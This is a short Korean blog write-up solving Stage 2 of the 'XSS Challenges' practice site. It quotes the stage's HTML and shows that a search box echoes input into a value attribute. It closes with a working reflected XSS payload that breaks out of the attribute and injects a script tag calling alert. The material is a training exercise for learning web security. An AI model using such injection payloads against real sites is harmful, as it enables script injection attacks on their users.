[XSS challenge] Stage #2

이번 문제에서는 입력한 값을 그대로 보여준다. 

소스코드를 보자.

<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=euc-jp">
  <link rel="stylesheet" type="text/css" href="style.css">
  <script language="JavaScript" type="text/javascript" src="script.js"></script>
  <title>XSS Challenges (by yamagata21) - Stage #2</title>
</head>
<body><div>
<h1>XSS Challenges</h1> <!-- Cross Site Scripting (XSS) Quiz -->
<h2>Stage #2</h2>
<b>What you have to do:</b><br>
Inject the following JavaScript command: <code>alert(document.domain);</code><p>
<b>Hint:</b> <span id="hide">close the current tag and add SCRIPT tag...</span>
<input type="hidden" name="key" value="tubhf.4/qiq">
<form action="?sid=c76be95ebd68c6734f402f2fc3ddaeb819d57eb5" method="post">
<hr class=red>Search: <input type="text" name="p1" size="60" value=""> <input type="submit" value="Search">
<hr class=red>
</form>
<span id="msg" style="display:none"></span>
<p><hr>
This page was written by yamagata21, 
inspired by <a href="http://blogged-on.de/xss/" target=_new>http://blogged-on.de/xss/</a>.
</div>

<!-- Google Analytics / *** THIS IS NOT A TARGET. PLEASE LAY OFF! *** -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-53066-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>
<!-- Google Analytics / *** THIS IS NOT A TARGET. PLEASE LAY OFF! *** -->

</body>
</html>

 

hint : close the current tag and add SCRIPT tag...

현재 태그를 닫으라고 한다.

 

<hr class=red>Search: <input type="text" name="p1" size="60" value=""> <input type="submit" value="Search">

검색창에 입력하면 그 값이 그대로 value에 들어가는 걸 알 수 있다.

 

태그를 닫으라는 건 value를 말하는 것 같다.

 

"><script>alert(document.domain);</script>

이렇게 입력하자 공격에 성공했다.